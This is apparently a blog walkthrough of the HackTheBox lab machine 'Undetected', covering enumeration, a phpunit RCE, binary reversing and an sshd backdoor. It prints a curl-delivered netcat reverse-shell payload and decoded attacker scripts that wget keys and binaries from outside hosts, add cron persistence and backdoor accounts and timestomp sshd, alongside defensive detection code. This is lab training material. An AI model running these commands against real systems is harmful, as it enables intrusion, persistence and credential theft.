HackTheBox: Undetected — WalkThrough
Today, we will be doing Undetected from HackTheBox, which is labeled as a medium-level box that aims at teaching package misconfigurations, binary reverse engineering and following the path of an attacker. Without further ado, let’s connect to our HTB OpenVPN network and start hacking!!!
Enumerating Open Ports
Only two ports seem to be open: 22 and 80.
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ nmap -p- --min-rate=10000 undetected.htb -vvv
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-24 17:25 +0545
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
11155/tcp filtered unknown no-response
61896/tcp filtered unknown no-response
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ nmap -p22,80 -sC -sV undetected.htb -vvv
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-25 09:50 +0545
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2 (protocol 2.0)
| ssh-hostkey:
| 3072 be:66:06:dd:20:77:ef:98:7f:6e:73:4a:98:a5:d8:f0 (RSA)
| 256 1f:a2:09:72:70:68:f4:58:ed:1f:6c:49:7d:e2:13:39 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBQjfhdRHFh+eC/2RtmQwDSGmf0psHnd2uqXFyN0zdiyxvF3WCQYaxOgerNZqC0RyQjm2hW0DN6/0oim3slS8dw=
| 256 70:15:39:94:c2:cd:64:cb:b2:3b:d1:3e:f6:09:44:e8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFdnC6v7My/dt23PaoX7MGbuZ8/8KZh1O+xt4dDFvFQK
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Diana's Jewelry
Let’s check the website right away. It is an e-commerce site primarily focused on selling jewellery. I couldn’t find any interesting endpoints after surfing the pages for a while. Then I came across the email contact@djewelry.htb, so I added djewelry.htb to my /etc/hosts file.
djewelry.htb is the same site that opens with the IP alone. There’s nothing here either, except the Store link, which takes us to store.djewelry.htb, which looks like the subdomain for placing orders. But the pages are under maintenance/migration at the moment.
Given that this website uses subdomains, it might have other virtual hosts hosted in its Apache server as well. Let’s do some subdomain bruteforcing on djewelry.htb.
┌──(kiran㉿kali)-[/usr/share/seclists/Discovery/DNS]
└─$ gobuster dns -d djewelry.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: djewelry.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
2022/07/25 10:17:22 Starting gobuster in DNS enumeration mode
===============================================================
Found: store.djewelry.htb
===============================================================
2022/07/25 10:50:59 Finished
===============================================================
Nothing found except store.djewelry.htb, which we already knew about. Seems like it is time for some directory bruteforcing.
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ ffuf -c -w /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://djewelry.htb/FUZZ -e .php,.txt,.zip
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://djewelry.htb/FUZZ
:: Wordlist : FUZZ: /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .txt .zip
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
images [Status: 301, Size: 313, Words: 20, Lines: 10]
icons [Status: 301, Size: 312, Words: 20, Lines: 10]
css [Status: 301, Size: 310, Words: 20, Lines: 10]
js [Status: 301, Size: 309, Words: 20, Lines: 10]
fonts [Status: 301, Size: 312, Words: 20, Lines: 10]
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ ffuf -c -w /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://store.djewelry.htb/FUZZ -e .php,.txt,.zip
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://store.djewelry.htb/FUZZ
:: Wordlist : FUZZ: /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .txt .zip
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.php [Status: 200, Size: 6215, Words: 528, Lines: 196]
images [Status: 301, Size: 325, Words: 20, Lines: 10]
products.php [Status: 200, Size: 7447, Words: 329, Lines: 230]
login.php [Status: 200, Size: 4129, Words: 464, Lines: 123]
cart.php [Status: 200, Size: 4396, Words: 470, Lines: 135]
css [Status: 301, Size: 322, Words: 20, Lines: 10]
js [Status: 301, Size: 321, Words: 20, Lines: 10]
vendor [Status: 301, Size: 325, Words: 20, Lines: 10]
fonts [Status: 301, Size: 324, Words: 20, Lines: 10]
The /vendor entry seems interesting. It’s a common convention to put files coming from various third-party sources (the “vendors”) in a folder named that way. Browsing it, we can clearly see all the PHP packages installed on this server, and the composer/installed.json file inside gives an exhaustive list.
Let’s use some string operations to filter out the package names and their corresponding versions so that we can poke at each of them in the hope of finding a vulnerability.
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ cat installed.json | jq -c '.[] | [.name, .version]'
["doctrine/instantiator","1.4.0"]
["myclabs/deep-copy","1.10.2"]
["phpdocumentor/reflection-common","2.2.0"]
["phpdocumentor/reflection-docblock","5.2.2"]
["phpdocumentor/type-resolver","1.4.0"]
["phpspec/prophecy","v1.10.3"]
["phpunit/php-code-coverage","4.0.8"]
["phpunit/php-file-iterator","1.4.5"]
["phpunit/php-text-template","1.2.1"]
["phpunit/php-timer","1.0.9"]
["phpunit/php-token-stream","2.0.2"]
["phpunit/phpunit","5.6.2"]
["phpunit/phpunit-mock-objects","3.4.4"]
["sebastian/code-unit-reverse-lookup","1.0.2"]
["sebastian/comparator","1.2.4"]
["sebastian/diff","1.4.3"]
["sebastian/environment","2.0.0"]
["sebastian/exporter","1.2.2"]
["sebastian/global-state","1.1.1"]
["sebastian/object-enumerator","1.0.0"]
["sebastian/recursion-context","1.0.5"]
["sebastian/resource-operations","1.0.0"]
["sebastian/version","2.0.1"]
["symfony/polyfill-ctype","v1.23.0"]
["symfony/yaml","v3.4.47"]
["webmozart/assert","1.10.0"]
After a bit of googling, I came across this post about phpunit v5.6.2, which is vulnerable to Remote Code Execution on the server. Without further ado, I fired the reverse shell payload using this exploit as below and listened with netcat. Luckily, it worked on the first try and gave a shell as the www-data user.
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ curl -XPOST --data '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 9001 >/tmp/f");' http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
www-data@production:/home$ cat /etc/passwd | grep sh | grep -v ssh
root:x:0:0:root:/root:/bin/bash
steven:x:1000:1000:Steven Wright:/home/steven:/bin/bash
steven1:x:1000:1000:,,,:/home/steven:/bin/bash
Analyzing the /etc/passwd file, two users other than root are present, i.e., steven and steven1. One thing to notice is that both have the same UID (1000), which is kind of weird. I have no permission to access this user’s home directory, so it’s time for horizontal privilege escalation. After checking the files currently owned by the www-data user, something that sticks out is /var/backups/info.
www-data@production:/tmp$ find / -user www-data -ls 2>/dev/null | grep -v "/var/www" | grep -v "/proc"
131761 316 -rw-r--r-- 1 www-data www-data 322453 Jul 26 11:12 /tmp/out
131758 0 prw-r--r-- 1 www-data www-data 0 Jul 26 15:11 /tmp/f
131760 304 -rwxr-xr-x 1 www-data www-data 308257 Jul 26 09:22 /tmp/linpease.sh
141800 4 drwx------ 2 www-data www-data 4096 Jul 26 09:13 /tmp/tmux-33
131759 0 srw-rw---- 1 www-data www-data 0 Jul 26 09:13 /tmp/tmux-33/default
4 0 crw--w---- 1 www-data tty 136, 1 Jul 26 15:11 /dev/pts/1
3 0 crw--w---- 1 www-data tty 136, 0 Jul 26 09:16 /dev/pts/0
15193 4 drwxr-xr-x 2 www-data www-data 4096 Feb 8 19:59 /var/cache/apache2/mod_cache_disk
17565 28 -r-x--x--x 1 www-data www-data 27296 May 14 2021 /var/backups/info
697 0 drwx------ 2 www-data www-data 40 Jul 26 11:04 /run/screen/S-www-data
5 0 drwxr-xr-x 2 www-data root 40 Jul 26 06:38 /run/lock/apache2
It seems to be a binary file which needs to be reversed.
www-data@production:/var/backups$ file info
info: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0dc004db7476356e9ed477835e583c68f1d2493a, for GNU/Linux 3.2.0, not stripped
www-data@production:/var/backups$ ./info
[.] starting
[.] namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[-] substring 'ffff' not found in dmesg
Looking inside the file using strings info gave us a hex-encoded blob that looks like something of value; let’s decode it.
[-] klogctl(SYSLOG_ACTION_READ_ALL)
Freeing SMP
[-] substring '%s' not found in dmesg
ffff
/bin/bash
776765742074656d7066696c65732e78797a2f617574686f72697a65645f6b657973202d4f202f726f6f742f2e7373682f617574686f72697a65645f6b6579733b20776765742074656d7066696c65732e78797a2f2e6d61696e202d4f202f7661722f6c69622f2e6d61696e3b2063686d6f64203735
35202f7661722f6c69622f2e6d61696e3b206563686f20222a2033202a202a202a20726f6f74202f7661722f6c69622f2e6d61696e22203e3e202f6574632f63726f6e7461623b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b7379
7374656d28226563686f2022243122313a5c24365c247a5337796b4866464d673361596874345c2431495572685a616e5275445a6866316f49646e6f4f76586f6f6c4b6d6c77626b656742586b2e567447673738654c3757424d364f724e7447625a784b427450753855666d39684d30522f424c6441
436f513054396e2f3a31383831333a303a39393939393a373a3a3a203e3e202f6574632f736861646f7722297d27202f6574632f7061737377643b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022
243122202224332220222436222022243722203e2075736572732e74787422297d27202f6574632f7061737377643b207768696c652072656164202d7220757365722067726f757020686f6d65207368656c6c205f3b20646f206563686f202224757365722231223a783a2467726f75703a2467726f
75703a2c2c2c3a24686f6d653a247368656c6c22203e3e202f6574632f7061737377643b20646f6e65203c2075736572732e7478743b20726d2075736572732e7478743b
[-] fork()
/etc/shadow
[.] checking if we got root
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab;
awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd;
awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd;
while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;
The script:
- Downloads an authorized_keys file from tempfiles.xyz and saves it for root as an SSH backdoor.
- Downloads a file, .main, saves it in /var/lib/, sets it executable, and adds it to the system crontab file to be run every minute from 3am to 4am each day.
- Finds each user in /etc/passwd that has the shell /bin/bash and a UID of 1000 or greater, and writes a line to /etc/shadow based on it.
- Finds each user in /etc/passwd with the same criteria again and this time writes their username, group, home folder, and shell to a file, users.txt.
- Loops over the rows in users.txt, creating rows in /etc/passwd for them with “1” appended to their username but keeping the same UID.
- Removes the users.txt file.
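From the defender’s side, the artefacts this script leaves behind are exactly what an account and crontab audit should catch: the shared UID noticed earlier in /etc/passwd, a clone account named after an existing user, and a root cron job pointing at a hidden file. The Python below is an added example (not from the box or the original write-up); the passwd and crontab samples are constructed to mirror what the box showed, and the function names are my own.

```python
from collections import defaultdict

# Constructed sample: the real 'steven' row plus the 'steven1' clone the
# script appends (same UID, same home directory, ',,,' GECOS field).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
steven:x:1000:1000:Steven Wright:/home/steven:/bin/bash
steven1:x:1000:1000:,,,:/home/steven:/bin/bash
"""

# Constructed sample system crontab containing the line the script appends.
CRONTAB_SAMPLE = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* 3 * * * root /var/lib/.main
"""


def passwd_rows(passwd_text):
    """Yield the 7 colon-separated fields of each well-formed passwd line."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2].isdigit() and not line.startswith("#"):
            yield fields


def duplicate_uids(passwd_text):
    """Return {uid: [names]} for every UID shared by more than one account."""
    by_uid = defaultdict(list)
    for fields in passwd_rows(passwd_text):
        by_uid[int(fields[2])].append(fields[0])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def cloned_accounts(passwd_text):
    """Return (clone, original) pairs where clone is original + '1' and both
    share UID and home directory, the exact shape the script creates."""
    rows = {f[0]: (f[2], f[5]) for f in passwd_rows(passwd_text)}
    return [(name, name[:-1]) for name in rows
            if name.endswith("1") and rows.get(name[:-1]) == rows[name]]


def suspicious_cron_lines(crontab_text):
    """Return system-crontab lines whose root job runs a hidden (dot) file."""
    hits = []
    for line in crontab_text.splitlines():
        parts = line.split()
        # system crontab layout: five time fields, user, then the command
        if len(parts) >= 7 and parts[5] == "root":
            if parts[6].rsplit("/", 1)[-1].startswith("."):
                hits.append(line)
    return hits


if __name__ == "__main__":
    print("shared UIDs:", duplicate_uids(PASSWD_SAMPLE))
    print("cloned accounts:", cloned_accounts(PASSWD_SAMPLE))
    print("root cron jobs on hidden files:", suspicious_cron_lines(CRONTAB_SAMPLE))
```

On a live host, read /etc/passwd and /etc/crontab into the same functions; the cron check deliberately ignores non-root jobs and the hourly run-parts line, so only the appended entry is reported.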
It’s time to crack the hash for this steven1 user. I loaded the hash into hashcat, and using the popular wordlist rockyou.txt it gave us the password ihatehackers.
└─# cat hash
steven1:$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ2T9n/:18813:0:99999:7:::
┌──(root💀kali)-[/home/…/Documents/boxes/htb/undetected]
└─# hashcat -m 1800 hash /usr/share/wordlists/rockyou.txt --force
hashcat (v6.1.1) starting...
$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ2T9n/:ihatehackers
Session..........: hashcat
Status...........: Cracked
Hash.Name........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwb...Q2T9n/
Time.Started.....: Wed Jul 27 10:20:56 2022, (2 mins, 30 secs)
Time.Estimated...: Wed Jul 27 10:23:26 2022, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 594 H/s (10.18ms) @ Accel:64 Loops:128 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 89088/14344387 (0.62%)
Rejected.........: 0/89088 (0.00%)
Restore.Point....: 88832/14344387 (0.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: joker4 -> hameed
Started: Wed Jul 27 10:19:37 2022
Stopped: Wed Jul 27 10:23:29 2022
After I logged in as the steven1 user, I got steven’s shell. This might be due to the fact that both users have the same UID. Now I can access the user flag; it’s time for vertical privilege escalation. So I ran linpeas.sh and found an interesting file, /var/mail/steven, which is actually an email from root@production to steven.
steven@production:~$ cat /var/mail/steven
From root@production Sun, 25 Jul 2021 10:31:12 GMT
----<SNIP>---
To: steven@production
From: root@production
Subject: Investigations
Hi Steven.
We recently updated the system but are still experiencing some strange behaviour with the Apache service.
We have temporarily moved the web store and database to another server whilst investigations are underway.
If for any reason you need access to the database or web application code, get in touch with Mark and he
will generate a temporary password for you to authenticate to the temporary server.
Thanks,
sysadmin
Since this box is named undetected, it suggests that the attacker’s steps have still not been detected. From this mail, one can suspect that something has been done to the Apache service and its files. After looking for a long time, I couldn’t find anything that stood out, so I started searching for files modified around the creation time of the /var/backups/info file. I found one module, ./mods-available/reader.load, that was modified on 17 May.
steven@production:/etc/apache2$ ls -l /var/backups/info
-r-x--x--x 1 www-data www-data 27296 May 14 2021 /var/backups/info
steven@production:/etc/apache2$ find . -type f -newermt 2021-05-10 ! -newermt 2021-05-30 -ls
50834 4 -rw-r--r-- 1 root root 69 May 17 2021 ./mods-available/reader.load
steven@production:/etc/apache2$ cat ./mods-available/reader.load
LoadModule reader_module /usr/lib/apache2/modules/mod_reader.so
steven@production:/etc/apache2$ file /usr/lib/apache2/modules/mod_reader.so
/usr/lib/apache2/modules/mod_reader.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=e26fdc45e4b6561d29af8306c2be74f35ab140bb, with debug_info, not stripped
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ strings mod_reader.so | less
----<SNIP>---
/bin/bash
mod_reader.c
d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk
;*3$"
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
42PA
GCC: (Debian 10.2.1-6) 10.2.1 20210110
w#%
----<SNIP>---
Again, using strings on this file gave one base64-encoded blob which, when decoded, revealed something interesting. The SSH daemon binary /usr/sbin/sshd has been modified. So let’s export this binary to our machine and fire it up with ghidra.
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ echo d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk | base64 -d
wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd
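Note what the second half of that command does: after replacing /usr/sbin/sshd it copies a2enmod’s modification date onto it, so a plain ls -l (or the find -newermt sweep used above) will not show the replacement. touch can rewrite mtime, but the kernel sets the inode change time (ctime) itself, so a back-dated file shows an old mtime next to a recent ctime. The Python below is an added example (not code from the box or the original write-up) that flags that mismatch; it assumes Linux stat semantics and reproduces the trick on constructed files in a temporary directory.

```python
import os
import shutil
import stat
import tempfile
import time


def timestomp_candidates(paths, skew_seconds=24 * 3600):
    """Return [(path, mtime, ctime)] for regular files whose inode change
    time is more than skew_seconds newer than their modification time.
    Linux semantics assumed: on Windows st_ctime is the creation time."""
    hits = []
    for path in paths:
        try:
            st = os.lstat(path)
        except OSError:
            continue  # unreadable or vanished: skip rather than abort the sweep
        if not stat.S_ISREG(st.st_mode):
            continue
        if st.st_ctime - st.st_mtime > skew_seconds:
            hits.append((path, st.st_mtime, st.st_ctime))
    return hits


def demo():
    """Reproduce the back-dating trick on throwaway files; return flagged names."""
    workdir = tempfile.mkdtemp()
    honest = os.path.join(workdir, "untouched.bin")
    stomped = os.path.join(workdir, "backdated.bin")
    for p in (honest, stomped):
        with open(p, "wb") as fh:
            fh.write(b"constructed placeholder contents")
    # Same effect as `touch -d <old date> <file>`: mtime goes back a year,
    # but the utime() call itself bumps ctime to "now".
    year_ago = time.time() - 365 * 24 * 3600
    os.utime(stomped, (year_ago, year_ago))
    flagged = [os.path.basename(h[0]) for h in timestomp_candidates([honest, stomped])]
    shutil.rmtree(workdir, ignore_errors=True)
    return flagged


if __name__ == "__main__":
    print("back-dated files:", demo())
```

On a real host, feed timestomp_candidates() the files under /usr/sbin, /usr/bin and /usr/lib/apache2/modules; legitimate package upgrades also raise ctime, so confirm hits against the package manager’s file list before acting on them.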
Reversing the file gave us an overwhelming number of functions to look at. Looking at the auth folder, auth_password looks like something the attacker might have taken advantage of to insert the payload.
This is the Ghidra-decompiled C code for the auth_password function.
/* WARNING: Could not reconcile some variable overlaps */
int auth_password(ssh *ssh,char *password)
{
    Authctxt *ctxt;
    passwd *ppVar1;
    int iVar2;
    uint uVar3;
    byte *pbVar4;
    byte *pbVar5;
    size_t sVar6;
    byte bVar7;
    int iVar8;
    long in_FS_OFFSET;
    char backdoor [31];
    byte local_39 [9];
    long local_30;

    /* the 31-byte backdoor string is built from constants, XOR-obfuscated with 0x96 */
    bVar7 = 0xd6;
    ctxt = (Authctxt *)ssh->authctxt;
    local_30 = *(long *)(in_FS_OFFSET + 0x28);
    backdoor._28_2_ = 0xa9f4;
    ppVar1 = ctxt->pw;
    iVar8 = ctxt->valid;
    backdoor._24_4_ = 0xbcf0b5e3;
    backdoor._16_8_ = 0xb2d6f4a0fda0b3d6;
    backdoor[30] = -0x5b;
    backdoor._0_4_ = 0xf0e7abd6;
    backdoor._4_4_ = 0xa4b3a3f3;
    backdoor._8_4_ = 0xf7bbfdc8;
    backdoor._12_4_ = 0xfdb3d6e7;
    pbVar4 = (byte *)backdoor;
    while( true ) {
        pbVar5 = pbVar4 + 1;
        *pbVar4 = bVar7 ^ 0x96;
        if (pbVar5 == local_39) break;
        bVar7 = *pbVar5;
        pbVar4 = pbVar5;
    }
    /* a match against the decoded string returns success (uVar3 = 1) without ever
       consulting the shadow file or PAM; only a mismatch falls through to real auth */
    iVar2 = strcmp(password,backdoor);
    uVar3 = 1;
    if (iVar2 != 0) {
        sVar6 = strlen(password);
        uVar3 = 0;
        if (sVar6 < 0x401) {
            if ((ppVar1->pw_uid == 0) && (options.permit_root_login != 3)) {
                iVar8 = 0;
            }
            if ((*password != '\0') ||
                (uVar3 = options.permit_empty_passwd, options.permit_empty_passwd != 0)) {
                if (auth_password::expire_checked == 0) {
                    auth_password::expire_checked = 1;
                    iVar2 = auth_shadow_pwexpired(ctxt);
                    if (iVar2 != 0) {
                        ctxt->force_pwchange = 1;
                    }
                }
                iVar2 = sys_auth_passwd(ssh,password);
                if (ctxt->force_pwchange != 0) {
                    auth_restrict_session(ssh);
                }
                uVar3 = (uint)(iVar2 != 0 && iVar8 != 0);
            }
        }
    }
    if (local_30 == *(long *)(in_FS_OFFSET + 0x28)) {
        return uVar3;
    }
    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
}
Looks like we need to recover the backdoor string from this code. The script below serves the purpose well for extracting the password.
import binascii

# Constants from the decompiled auth_password(), written out from backdoor[30]
# down to backdoor[0]; reversing the byte string restores little-endian memory order.
backdoor_str = 'a5a9f4bcf0b5e3b2d6f4a0fda0b3d6fdb3d6e7f7bbfdc8a4b3a3f3f0e7abd6'
backdoor = binascii.unhexlify(backdoor_str)[::-1]
print(f'Backdoor is: {backdoor}')
# The loop in auth_password() XORs every byte with 0x96 before the strcmp()
print(''.join([chr(b ^ 0x96) for b in backdoor]))
#--------------Reference: 0xdf.gitlab.io---------------#
After we get the root password using this script, one can SSH into the server as the root user and grab the system flag.
Such a nice box. Happy Hacking!!!
Founder of cybersecnerds.com. Cybersecurity professional with 3+ years of experience in offensive web security, cloud security and building systems.
I am a Linux evangelist and highly interested in source-code auditing. You will find me reading InfoSec blogs most of the time.